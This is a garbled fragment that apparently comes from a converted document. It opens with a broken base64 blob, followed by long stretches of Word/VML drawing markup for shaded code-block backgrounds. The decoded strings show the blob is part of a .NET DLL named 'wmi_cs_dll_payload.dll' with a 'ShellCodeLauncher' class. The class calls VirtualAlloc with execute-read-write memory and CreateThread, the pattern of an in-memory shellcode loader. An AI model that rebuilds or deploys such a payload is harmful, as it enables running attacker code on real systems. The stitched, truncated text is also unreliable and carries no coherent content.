QABAAEAAAAAAPwBAAAFAAMABwATAQAAZgIAACEABAAHABEAX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QASABEA"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70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"aAASABMBhAI+AFAgAAAAAIYYUgAKAAEAwCEAAAAAkQBYAA4AAQAAAAAAgACRIH8AFQABA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AAAAACA"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71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"AJEgjAAdAAUAAAAAAIAAkSCZACgACwAxIgAAAACRGDADDgANAAAAAQCtAAAAAgC5AAAAA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wC+AAAA"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72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"BADPAAAAAQDZAAAAAgDsAAAAAwD4AAAABAAHAQAABQANAQAABgAdAQAAAQAoAQAAAgAwA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REAUgAu"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73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"ACEAUgA0ACkAUgAKAAkAUgAKADkAUgAKAEkAwAJCAGEA1wJKAGkACgNPAGEADwNYAHEAU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gBkAHkA"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"UgAKACcAWwA5AC4AEwBpAC4AGwByAGMAKwA5AAgABgCRAAEAVQEAAAQAWwAnAwABBwB/A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AEAAAEJ"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"AIwAAQAAAQsAmQABAGggAAADAASAAAAAAAAAAAAAAAAAAAAAAOQBAAAEAAAAAAAAAAAAA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AABADsA"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"AAAAAAQAAwAAAAA8TW9kdWxlPgB3bWlfY3NfZGxsX3BheWxvYWQuZGxsAFByb2dyYW0AU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2hlbGxD"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"b2RlTGF1bmNoZXIAbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAuY3RvcgBNYWluAE1FTV9DT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01NSVQA"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"UEFHRV9FWEVDVVRFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MAQ3JlYXRlVGhyZWFkAFdha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XRGb3JT"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"aW5nbGVPYmplY3QAbHBTdGFydEFkZHIAc2l6ZQBmbEFsbG9jYXRpb25UeXBlAGZsUHJvd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GVjdABs"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999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999l1517,999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8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8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4,10484,3575,10484,3577,10484,3579,10484,3581,10484,3583,10484,3586,10484,3588,10484,3591,10484,3593,10484,3596,10484,3599,10484,3602,10484,3605,10484,3608,10484,3611,10484,3614,10484,3618,10484,3622,10484,3626,10484,3629,10484,3634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4,1517,3575,1517,3577,1517,3579,1517,3581,1517,3583,1517,3586,1517,3588,1517,3591,1517,3593,1517,3596,1517,3599,1517,3602,1517,3605,1517,3608,1517,3611,1517,3614,1517,3618,1517,3622,1517,3626,1517,3629,1517,3634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6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5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2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5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1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2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2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31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:6730;width:8990;height:630" coordorigin="1490,6730" coordsize="8990,6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8,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6749,10484,6749,10484,6749,10484,6750,10484,6750,10484,6750,10484,6751,10484,6751,10484,6752,10484,6753,10484,6753,10484,6754,10484,6755,10484,6756,10484,6757,10484,6757,10484,6759,10484,6760,10484,6761,10484,6762,10484,6763,10484,6765,10484,6766,10484,6768,10484,6770,10484,6771,10484,6773,10484,6775,10484,6777,10484,6779,10484,6781,10484,6784,10484,6786,10484,6789,10484,6791,10484,6794,10484,6797,10484,6800,10484,6803,10484,6806,10484,6810,10484,6813,10484,6817,10484,6820,10484,6824,10484,6828,10484,6832,10484,6837,10484,6841,10484,6845,10484,6850,10484,6855,10484,6860,10484,6865,10484,6870,10484,6876,10484,6881,10484,6887,10484,6893,10484,6899,10484,6905,10484,6912,10484,6918,10484,6925,10484,6932,10484,6939,10484,6946,10484,6954,10484,6961,10484,6969,10484,6977,10484,6985,10484,6994,10484,7002,10484,7011,10484,7020,10484,7029,10484,7039,10484,7048,10484,7058,10484,7068,10484,7078,10484,7089,10484,7099,10484,7110,10484,7121,10484,7133,10484,7144,10484,7156,10484,7168,10484,7180,10484,7193,10484,7206,10484,7219,10484,7232,10484,7245,10484,7259,10484,7273,10484,7287,10484,7302,10484,7316,10484,7331,10484,7346,10484,7362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7,1510,7377,1510,7377,1510,7377,1510,7377,1510,7377,1510,7376,1510,7376,1510,7376,1510,7376,1510,7375,1510,7375,1510,7374,1510,7374,1510,7373,1510,7373,1510,7372,1510,7371,1510,7370,1510,7370,1510,7369,1510,7368,1510,7367,1510,7365,1510,7364,1510,7363,1510,7362,1510,7360,1510,7359,1510,7357,1510,7356,1510,7354,1510,7352,1510,7350,1510,7348,1510,7346,1510,7344,1510,7341,1510,7339,1510,7336,1510,7334,1510,7331,1510,7328,1510,7325,1510,7322,1510,7319,1510,7315,1510,7312,1510,7308,1510,7305,1510,7301,1510,7297,1510,7293,1510,7289,1510,7284,1510,7280,1510,7275,1510,7270,1510,7265,1510,7260,1510,7255,1510,7249,1510,7244,1510,7238,1510,7232,1510,7226,1510,7220,1510,7214,1510,7207,1510,7200,1510,7193,1510,7186,1510,7179,1510,7171,1510,7164,1510,7156,1510,7148,1510,7140,1510,7131,1510,7123,1510,7114,1510,7105,1510,7096,1510,7086,1510,7077,1510,7067,1510,7057,1510,7047,1510,7036,1510,7026,1510,7015,1510,7004,1510,6992,1510,6981,1510,6969,1510,6957,1510,6945,1510,6932,1510,6919,1510,6907,1510,6893,1510,6880,1510,6866,1510,6852,1510,6838,1510,6824,1510,6809,1510,6794,1510,6779,1510,6763,1510,6747e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:336.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:6730;width:30;height:650" coordorigin="1490,6730" coordsize="30,650" path="m1517,6747l1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6749,1517,6749,1517,6749,1517,6750,1517,6750,1517,6750,1517,6751,1517,6751,1517,6752,1517,6753,1517,6753,1517,6754,1517,6755,1517,6756,1517,6757,1517,6757,1517,6759,1517,6760,1517,6761,1517,6762,1517,6763,1517,6765,1517,6766,1517,6768,1517,6770,1517,6771,1517,6773,1517,6775,1517,6777,1517,6779,1517,6781,1517,6784,1517,6786,1517,6789,1517,6791,1517,6794,1517,6797,1517,6800,1517,6803,1517,6806,1517,6810,1517,6813,1517,6817,1517,6820,1517,6824,1517,6828,1517,6832,1517,6837,1517,6841,1517,6845,1517,6850,1517,6855,1517,6860,1517,6865,1517,6870,1517,6876,1517,6881,1517,6887,1517,6893,1517,6899,1517,6905,1517,6912,1517,6918,1517,6925,1517,6932,1517,6939,1517,6946,1517,6954,1517,6961,1517,6969,1517,6977,1517,6985,1517,6994,1517,7002,1517,7011,1517,7020,1517,7029,1517,7039,1517,7048,1517,7058,1517,7068,1517,7078,1517,7089,1517,7099,1517,7110,1517,7121,1517,7133,1517,7144,1517,7156,1517,7168,1517,7180,1517,7193,1517,7206,1517,7219,1517,7232,1517,7245,1517,7259,1517,7273,1517,7287,1517,7302,1517,7316,1517,7331,1517,7346,1517,7362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33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7350" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:7350;width:8990;height:670" coordorigin="1490,7350" coordsize="8990,67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9,10484,7379,10484,7379,10484,7379,10484,7380,10484,7380,10484,7380,10484,7381,10484,7381,10484,7382,10484,7382,10484,7383,10484,7384,10484,7384,10484,7385,10484,7386,10484,7387,10484,7388,10484,7389,10484,7390,10484,7391,10484,7393,10484,7394,10484,7396,10484,7397,10484,7399,10484,7400,10484,7402,10484,7404,10484,7406,10484,7408,10484,7410,10484,7413,10484,7415,10484,7417,10484,7420,10484,7423,10484,7426,10484,7429,10484,7432,10484,7435,10484,7438,10484,7441,10484,7445,10484,7449,10484,7452,10484,7456,10484,7460,10484,7465,10484,7469,10484,7473,10484,7478,10484,7483,10484,7488,10484,7493,10484,7498,10484,7504,10484,7509,10484,7515,10484,7521,10484,7527,10484,7533,10484,7539,10484,7546,10484,7553,10484,7559,10484,7567,10484,7574,10484,7581,10484,7589,10484,7597,10484,7605,10484,7613,10484,7621,10484,7630,10484,7639,10484,7648,10484,7657,10484,7666,10484,7676,10484,7686,10484,7696,10484,7706,10484,7717,10484,7727,10484,7738,10484,7749,10484,7761,10484,7772,10484,7784,10484,7796,10484,7808,10484,7821,10484,7834,10484,7847,10484,7860,10484,7874,10484,7887,10484,7901,10484,7916,10484,7930,10484,7945,10484,7960,10484,7975,10484,7991,10484,8007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2,1510,8022,1510,8022,1510,8022,1510,8021,1510,8021,1510,8021,1510,8020,1510,8020,1510,8019,1510,8019,1510,8018,1510,8018,1510,8017,1510,8016,1510,8016,1510,8015,1510,8014,1510,8013,1510,8012,1510,8010,1510,8009,1510,8008,1510,8007,1510,8005,1510,8004,1510,8002,1510,8000,1510,7999,1510,7997,1510,7995,1510,7993,1510,7990,1510,7988,1510,7986,1510,7983,1510,7981,1510,7978,1510,7975,1510,7972,1510,7969,1510,7966,1510,7963,1510,7959,1510,7956,1510,7952,1510,7948,1510,7944,1510,7940,1510,7936,1510,7932,1510,7927,1510,7923,1510,7918,1510,7913,1510,7908,1510,7903,1510,7897,1510,7892,1510,7886,1510,7880,1510,7874,1510,7868,1510,7861,1510,7855,1510,7848,1510,7841,1510,7834,1510,7827,1510,7820,1510,7812,1510,7804,1510,7796,1510,7788,1510,7779,1510,7771,1510,7762,1510,7753,1510,7744,1510,7734,1510,7725,1510,7715,1510,7705,1510,7695,1510,7684,1510,7674,1510,7663,1510,7651,1510,7640,1510,7628,1510,7617,1510,7605,1510,7592,1510,7580,1510,7567,1510,7554,1510,7541,1510,7527,1510,7513,1510,7499,1510,7485,1510,7470,1510,7456,1510,7441,1510,7425,1510,7410,1510,7394,1510,7378e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:368.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7370" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:7370;width:30;height:650" coordorigin="1490,7370" coordsize="30,650" path="m1517,7378l1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7379,1517,7379,1517,7379,1517,7379,1517,7380,1517,7380,1517,7380,1517,7381,1517,7381,1517,7382,1517,7382,1517,7383,1517,7384,1517,7384,1517,7385,1517,7386,1517,7387,1517,7388,1517,7389,1517,7390,1517,7391,1517,7393,1517,7394,1517,7396,1517,7397,1517,7399,1517,7400,1517,7402,1517,7404,1517,7406,1517,7408,1517,7410,1517,7413,1517,7415,1517,7417,1517,7420,1517,7423,1517,7426,1517,7429,1517,7432,1517,7435,1517,7438,1517,7441,1517,7445,1517,7449,1517,7452,1517,7456,1517,7460,1517,7465,1517,7469,1517,7473,1517,7478,1517,7483,1517,7488,1517,7493,1517,7498,1517,7504,1517,7509,1517,7515,1517,7521,1517,7527,1517,7533,1517,7539,1517,7546,1517,7553,1517,7559,1517,7567,1517,7574,1517,7581,1517,7589,1517,7597,1517,7605,1517,7613,1517,7621,1517,7630,1517,7639,1517,7648,1517,7657,1517,7666,1517,7676,1517,7686,1517,7696,1517,7706,1517,7717,1517,7727,1517,7738,1517,7749,1517,7761,1517,7772,1517,7784,1517,7796,1517,7808,1517,7821,1517,7834,1517,7847,1517,7860,1517,7874,1517,7887,1517,7901,1517,7916,1517,7930,1517,7945,1517,7960,1517,7975,1517,7991,1517,8007,1517,8023e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:400.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8010" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:8010;width:8990;height:630" coordorigin="1490,8010" coordsize="8990,630" path="m1510,8023l1510,8023,1510,8023,1510,8023,1510,8023,1510,8023,1510,8023,1511,8023,1512,8023,1512,8023,1514,8023,1515,8023,1517,8023,1519,8023,1521,8023,1524,8023,1528,8023,1532,8023,1536,8023,1541,8023,1546,8023,1552,8023,1559,8023,1566,8023,1575,8023,1583,8023,1593,8023,1603,8023,1615,8023,1627,8023,1640,8023,1654,8023,1668,8023,1684,8023,1701,8023,1719,8023,1738,8023,1758,8023,1780,8023,1802,8023,1826,8023,1851,8023,1877,8023,1904,8023,1933,8023,1963,8023,1995,8023,2028,8023,2063,8023,2099,8023,2136,8023,2175,8023,2216,8023,2259,8023,2303,8023,2348,8023,2396,8023,2445,8023,2496,8023,2549,8023,2604,8023,2660,8023,2719,8023,2779,8023,2841,8023,2906,8023,2972,8023,3041,8023,3112,8023,3184,8023,3259,8023,3336,8023,3416,8023,3498,8023,3582,8023,3668,8023,3757,8023,3848,8023,3941,8023,4037,8023,4136,8023,4236,8023,4340,8023,4446,8023,4555,8023,4666,8023,4780,8023,4897,8023,5017,8023,5139,8023,5264,8023,5392,8023,5523,8023,5657,8023,5793,8023,5933,8023,6076,8023,6222,8023,6370,8023,6522,8023,6677,8023,6835,8023,6997,8023,7161,8023,7329,8023,7500,8023,7675,8023,7853,8023,8034,8023,8219,8023,8407,8023,8598,8023,8793,8023,8992,8023,9194,8023,9400,8023,9609,8023,9823,8023,10039,8023,10260,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8024,10484,8024,10484,8024,10484,8024,10484,8024,10484,8025,10484,8025,10484,8025,10484,8026,10484,8026,10484,8027,10484,8027,10484,8028,10484,8028,10484,8029,10484,8030,10484,8030,10484,8031,10484,8032,10484,8033,10484,8034,10484,8035,10484,8036,10484,8038,10484,8039,10484,8040,10484,8042,10484,8044,10484,8045,10484,8047,10484,8049,10484,8051,10484,8053,10484,8055,10484,8057,10484,8059,10484,8062,10484,8064,10484,8067,10484,8070,10484,8073,10484,8076,10484,8079,10484,8082,10484,8085,10484,8089,10484,8092,10484,8096,10484,8100,10484,8104,10484,8108,10484,8112,10484,8117,10484,8121,10484,8126,10484,8131,10484,8136,10484,8141,10484,8146,10484,8151,10484,8157,10484,8163,10484,8169,10484,8175,10484,8181,10484,8187,10484,8194,10484,8201,10484,8207,10484,8215,10484,8222,10484,8229,10484,8237,10484,8245,10484,8253,10484,8261,10484,8269,10484,8278,10484,8287,10484,8296,10484,8305,10484,8314,10484,8324,10484,8334,10484,8344,10484,8354,10484,8364,10484,8375,10484,8386,10484,8397,10484,8408,10484,8420,10484,8432,10484,8444,10484,8456,10484,8469,10484,8481,10484,8494,10484,8507,10484,8521,10484,8535,10484,8549,10484,8563,10484,8577,10484,8592,10484,8607,10484,8622,10484,8638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2,1510,8652,1510,8652,1510,8652,1510,8651,1510,8651,1510,8650,1510,8650,1510,8649,1510,8649,1510,8648,1510,8648,1510,8647,1510,8646,1510,8645,1510,8644,1510,8643,1510,8642,1510,8641,1510,8640,1510,8639,1510,8637,1510,8636,1510,8634,1510,8633,1510,8631,1510,8629,1510,8628,1510,8626,1510,8624,1510,8621,1510,8619,1510,8617,1510,8615,1510,8612,1510,8609,1510,8607,1510,8604,1510,8601,1510,8598,1510,8594,1510,8591,1510,8588,1510,8584,1510,8580,1510,8577,1510,8573,1510,8568,1510,8564,1510,8560,1510,8555,1510,8551,1510,8546,1510,8541,1510,8536,1510,8530,1510,8525,1510,8519,1510,8514,1510,8508,1510,8502,1510,8496,1510,8489,1510,8483,1510,8476,1510,8469,1510,8462,1510,8455,1510,8447,1510,8439,1510,8432,1510,8424,1510,8415,1510,8407,1510,8398,1510,8390,1510,8381,1510,8371,1510,8362,1510,8352,1510,8343,1510,8333,1510,8322,1510,8312,1510,8301,1510,8290,1510,8279,1510,8268,1510,8256,1510,8245,1510,8233,1510,8220,1510,8208,1510,8195,1510,8182,1510,8169,1510,8156,1510,8142,1510,8128,1510,8114,1510,8099,1510,8084,1510,8070,1510,8054,1510,8039,1510,8023e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:400.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8010" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:8010;width:30;height:650" coordorigin="1490,8010" coordsize="30,650" path="m1517,8023l1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8024,1517,8024,1517,8024,1517,8024,1517,8024,1517,8025,1517,8025,1517,8025,1517,8026,1517,8026,1517,8027,1517,8027,1517,8028,1517,8028,1517,8029,1517,8030,1517,8030,1517,8031,1517,8032,1517,8033,1517,8034,1517,8035,1517,8036,1517,8038,1517,8039,1517,8040,1517,8042,1517,8044,1517,8045,1517,8047,1517,8049,1517,8051,1517,8053,1517,8055,1517,8057,1517,8059,1517,8062,1517,8064,1517,8067,1517,8070,1517,8073,1517,8076,1517,8079,1517,8082,1517,8085,1517,8089,1517,8092,1517,8096,1517,8100,1517,8104,1517,8108,1517,8112,1517,8117,1517,8121,1517,8126,1517,8131,1517,8136,1517,8141,1517,8146,1517,8151,1517,8157,1517,8163,1517,8169,1517,8175,1517,8181,1517,8187,1517,8194,1517,8201,1517,8207,1517,8215,1517,8222,1517,8229,1517,8237,1517,8245,1517,8253,1517,8261,1517,8269,1517,8278,1517,8287,1517,8296,1517,8305,1517,8314,1517,8324,1517,8334,1517,8344,1517,8354,1517,8364,1517,8375,1517,8386,1517,8397,1517,8408,1517,8420,1517,8432,1517,8444,1517,8456,1517,8469,1517,8481,1517,8494,1517,8507,1517,8521,1517,8535,1517,8549,1517,8563,1517,8577,1517,8592,1517,8607,1517,8622,1517,8638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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8630" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:8630;width:8990;height:650" coordorigin="1490,8630" coordsize="8990,6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4,10484,8654,10484,8654,10484,8654,10484,8654,10484,8654,10484,8654,10484,8655,10484,8655,10484,8655,10484,8656,10484,8656,10484,8656,10484,8657,10484,8657,10484,8658,10484,8659,10484,8659,10484,8660,10484,8661,10484,8662,10484,8663,10484,8664,10484,8665,10484,8666,10484,8667,10484,8668,10484,8670,10484,8671,10484,8673,10484,8674,10484,8676,10484,8678,10484,8680,10484,8682,10484,8684,10484,8686,10484,8688,10484,8691,10484,8693,10484,8696,10484,8698,10484,8701,10484,8704,10484,8707,10484,8710,10484,8714,10484,8717,10484,8721,10484,8724,10484,8728,10484,8732,10484,8736,10484,8740,10484,8745,10484,8749,10484,8754,10484,8759,10484,8763,10484,8769,10484,8774,10484,8779,10484,8785,10484,8790,10484,8796,10484,8802,10484,8809,10484,8815,10484,8821,10484,8828,10484,8835,10484,8842,10484,8849,10484,8857,10484,8865,10484,8872,10484,8880,10484,8889,10484,8897,10484,8906,10484,8914,10484,8923,10484,8933,10484,8942,10484,8952,10484,8961,10484,8971,10484,8982,10484,8992,10484,9003,10484,9014,10484,9025,10484,9036,10484,9048,10484,9060,10484,9072,10484,9084,10484,9097,10484,9109,10484,9122,10484,9136,10484,9149,10484,9163,10484,9177,10484,9191,10484,9206,10484,9221,10484,9236,10484,9251,10484,9267,10484,9283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8,1510,9298,1510,9298,1510,9298,1510,9298,1510,9298,1510,9298,1510,9297,1510,9297,1510,9297,1510,9296,1510,9296,1510,9296,1510,9295,1510,9295,1510,9294,1510,9293,1510,9293,1510,9292,1510,9291,1510,9290,1510,9289,1510,9288,1510,9287,1510,9286,1510,9285,1510,9284,1510,9282,1510,9281,1510,9279,1510,9278,1510,9276,1510,9274,1510,9272,1510,9270,1510,9268,1510,9266,1510,9264,1510,9261,1510,9259,1510,9256,1510,9254,1510,9251,1510,9248,1510,9245,1510,9242,1510,9238,1510,9235,1510,9231,1510,9228,1510,9224,1510,9220,1510,9216,1510,9212,1510,9207,1510,9203,1510,9198,1510,9194,1510,9189,1510,9184,1510,9178,1510,9173,1510,9167,1510,9162,1510,9156,1510,9150,1510,9144,1510,9137,1510,9131,1510,9124,1510,9117,1510,9110,1510,9103,1510,9095,1510,9088,1510,9080,1510,9072,1510,9064,1510,9055,1510,9047,1510,9038,1510,9029,1510,9020,1510,9010,1510,9000,1510,8991,1510,8981,1510,8970,1510,8960,1510,8949,1510,8938,1510,8927,1510,8916,1510,8904,1510,8892,1510,8880,1510,8868,1510,8855,1510,8843,1510,8830,1510,8816,1510,8803,1510,8789,1510,8775,1510,8761,1510,8746,1510,8731,1510,8716,1510,8701,1510,8685,1510,8669,1510,8653e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:432.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8650" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:8650;width:30;height:650" coordorigin="1490,8650" coordsize="30,650" path="m1517,8653l1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8655,1517,8655,1517,8655,1517,8656,1517,8656,1517,8656,1517,8657,1517,8657,1517,8658,1517,8659,1517,8659,1517,8660,1517,8661,1517,8662,1517,8663,1517,8664,1517,8665,1517,8666,1517,8667,1517,8668,1517,8670,1517,8671,1517,8673,1517,8674,1517,8676,1517,8678,1517,8680,1517,8682,1517,8684,1517,8686,1517,8688,1517,8691,1517,8693,1517,8696,1517,8698,1517,8701,1517,8704,1517,8707,1517,8710,1517,8714,1517,8717,1517,8721,1517,8724,1517,8728,1517,8732,1517,8736,1517,8740,1517,8745,1517,8749,1517,8754,1517,8759,1517,8763,1517,8769,1517,8774,1517,8779,1517,8785,1517,8790,1517,8796,1517,8802,1517,8809,1517,8815,1517,8821,1517,8828,1517,8835,1517,8842,1517,8849,1517,8857,1517,8865,1517,8872,1517,8880,1517,8889,1517,8897,1517,8906,1517,8914,1517,8923,1517,8933,1517,8942,1517,8952,1517,8961,1517,8971,1517,8982,1517,8992,1517,9003,1517,9014,1517,9025,1517,9036,1517,9048,1517,9060,1517,9072,1517,9084,1517,9097,1517,9109,1517,9122,1517,9136,1517,9149,1517,9163,1517,9177,1517,9191,1517,9206,1517,9221,1517,9236,1517,9251,1517,9267,1517,9283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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9270" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:9270;width:8990;height:650" coordorigin="1490,9270" coordsize="8990,65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300,10484,9300,10484,9300,10484,9300,10484,9301,10484,9301,10484,9301,10484,9302,10484,9302,10484,9303,10484,9303,10484,9304,10484,9305,10484,9305,10484,9306,10484,9307,10484,9308,10484,9309,10484,9310,10484,9311,10484,9312,10484,9313,10484,9315,10484,9316,10484,9318,10484,9319,10484,9321,10484,9323,10484,9324,10484,9326,10484,9328,10484,9331,10484,9333,10484,9335,10484,9338,10484,9340,10484,9343,10484,9345,10484,9348,10484,9351,10484,9354,10484,9358,10484,9361,10484,9364,10484,9368,10484,9372,10484,9376,10484,9379,10484,9384,10484,9388,10484,9392,10484,9397,10484,9401,10484,9406,10484,9411,10484,9416,10484,9422,10484,9427,10484,9433,10484,9438,10484,9444,10484,9450,10484,9456,10484,9463,10484,9469,10484,9476,10484,9483,10484,9490,10484,9497,10484,9505,10484,9513,10484,9520,10484,9528,10484,9537,10484,9545,10484,9554,10484,9562,10484,9571,10484,9581,10484,9590,10484,9600,10484,9609,10484,9619,10484,9630,10484,9640,10484,9651,10484,9662,10484,9673,10484,9684,10484,9696,10484,9707,10484,9719,10484,9732,10484,9744,10484,9757,10484,9770,10484,9783,10484,9797,10484,9810,10484,9824,10484,9838,10484,9853,10484,9868,10484,9883,10484,9898,10484,9913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9,1510,9928,1510,9928,1510,9928,1510,9928,1510,9927,1510,9927,1510,9927,1510,9926,1510,9926,1510,9926,1510,9925,1510,9924,1510,9924,1510,9923,1510,9922,1510,9922,1510,9921,1510,9920,1510,9919,1510,9918,1510,9917,1510,9916,1510,9914,1510,9913,1510,9912,1510,9910,1510,9908,1510,9907,1510,9905,1510,9903,1510,9901,1510,9899,1510,9897,1510,9895,1510,9893,1510,9890,1510,9888,1510,9885,1510,9882,1510,9879,1510,9876,1510,9873,1510,9870,1510,9867,1510,9863,1510,9860,1510,9856,1510,9852,1510,9848,1510,9844,1510,9840,1510,9835,1510,9831,1510,9826,1510,9821,1510,9817,1510,9811,1510,9806,1510,9801,1510,9795,1510,9789,1510,9783,1510,9777,1510,9771,1510,9765,1510,9758,1510,9751,1510,9745,1510,9737,1510,9730,1510,9723,1510,9715,1510,9707,1510,9699,1510,9691,1510,9683,1510,9674,1510,9665,1510,9656,1510,9647,1510,9638,1510,9628,1510,9618,1510,9608,1510,9598,1510,9588,1510,9577,1510,9566,1510,9555,1510,9544,1510,9532,1510,9520,1510,9508,1510,9496,1510,9484,1510,9471,1510,9458,1510,9445,1510,9431,1510,9417,1510,9403,1510,9389,1510,9375,1510,9360,1510,9345,1510,9330,1510,9314,1510,9299e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:464.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9290" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:9290;width:30;height:630" coordorigin="1490,9290" coordsize="30,630" path="m1517,9299l1517,9299,1517,9299,1517,9299,1517,9299,1517,9299,1517,9299,1517,9299,1517,9299,1517,9299,1517,9299,1517,9299,1517,9299,1517,9299,1517,9300,1517,9300,1517,9300,1517,9300,1517,9301,1517,9301,1517,9301,1517,9302,1517,9302,1517,9303,1517,9303,1517,9304,1517,9305,1517,9305,1517,9306,1517,9307,1517,9308,1517,9309,1517,9310,1517,9311,1517,9312,1517,9313,1517,9315,1517,9316,1517,9318,1517,9319,1517,9321,1517,9323,1517,9324,1517,9326,1517,9328,1517,9331,1517,9333,1517,9335,1517,9338,1517,9340,1517,9343,1517,9345,1517,9348,1517,9351,1517,9354,1517,9358,1517,9361,1517,9364,1517,9368,1517,9372,1517,9376,1517,9379,1517,9384,1517,9388,1517,9392,1517,9397,1517,9401,1517,9406,1517,9411,1517,9416,1517,9422,1517,9427,1517,9433,1517,9438,1517,9444,1517,9450,1517,9456,1517,9463,1517,9469,1517,9476,1517,9483,1517,9490,1517,9497,1517,9505,1517,9513,1517,9520,1517,9528,1517,9537,1517,9545,1517,9554,1517,9562,1517,9571,1517,9581,1517,9590,1517,9600,1517,9609,1517,9619,1517,9630,1517,9640,1517,9651,1517,9662,1517,9673,1517,9684,1517,9696,1517,9707,1517,9719,1517,9732,1517,9744,1517,9757,1517,9770,1517,9783,1517,9797,1517,9810,1517,9824,1517,9838,1517,9853,1517,9868,1517,9883,1517,9898,1517,9913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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9910" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:9910;width:8990;height:650" coordorigin="1490,9910" coordsize="8990,65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30,10484,9930,10484,9930,10484,9930,10484,9930,10484,9931,10484,9931,10484,9931,10484,9932,10484,9932,10484,9933,10484,9933,10484,9934,10484,9934,10484,9935,10484,9936,10484,9937,10484,9937,10484,9938,10484,9939,10484,9940,10484,9942,10484,9943,10484,9944,10484,9945,10484,9947,10484,9948,10484,9950,10484,9952,10484,9954,10484,9955,10484,9957,10484,9959,10484,9962,10484,9964,10484,9966,10484,9969,10484,9971,10484,9974,10484,9977,10484,9980,10484,9983,10484,9986,10484,9989,10484,9993,10484,9996,10484,10000,10484,10004,10484,10008,10484,10012,10484,10016,10484,10020,10484,10025,10484,10029,10484,10034,10484,10039,10484,10044,10484,10049,10484,10055,10484,10060,10484,10066,10484,10072,10484,10078,10484,10084,10484,10091,10484,10097,10484,10104,10484,10111,10484,10118,10484,10125,10484,10133,10484,10140,10484,10148,10484,10156,10484,10164,10484,10173,10484,10181,10484,10190,10484,10199,10484,10208,10484,10218,10484,10227,10484,10237,10484,10247,10484,10257,10484,10268,10484,10279,10484,10289,10484,10301,10484,10312,10484,10324,10484,10335,10484,10347,10484,10360,10484,10372,10484,10385,10484,10398,10484,10411,10484,10425,10484,10439,10484,10453,10484,10467,10484,10482,10484,10496,10484,10511,10484,10527,10484,10542,10484,10558,10484,10574,10484,10574,10484,10574,10484,10574,10484,10574,10484,10574,10484,10574,10483,10574,10482,10574,10482,10574,10480,10574,10479,10574,10477,10574,10475,10574,10473,10574,10470,10574,10466,10574,10462,10574,10458,10574,10453,10574,10448,10574,10442,10574,10435,10574,10428,10574,10419,10574,10411,10574,10401,10574,10391,10574,10379,10574,10367,10574,10354,10574,10340,10574,10326,10574,10310,10574,10293,10574,10275,10574,10256,10574,10236,10574,10215,10574,10192,10574,10168,10574,10143,10574,10117,10574,10090,10574,10061,10574,10031,10574,9999,10574,9966,10574,9931,10574,9895,10574,9858,10574,9819,10574,9778,10574,9735,10574,9691,10574,9646,10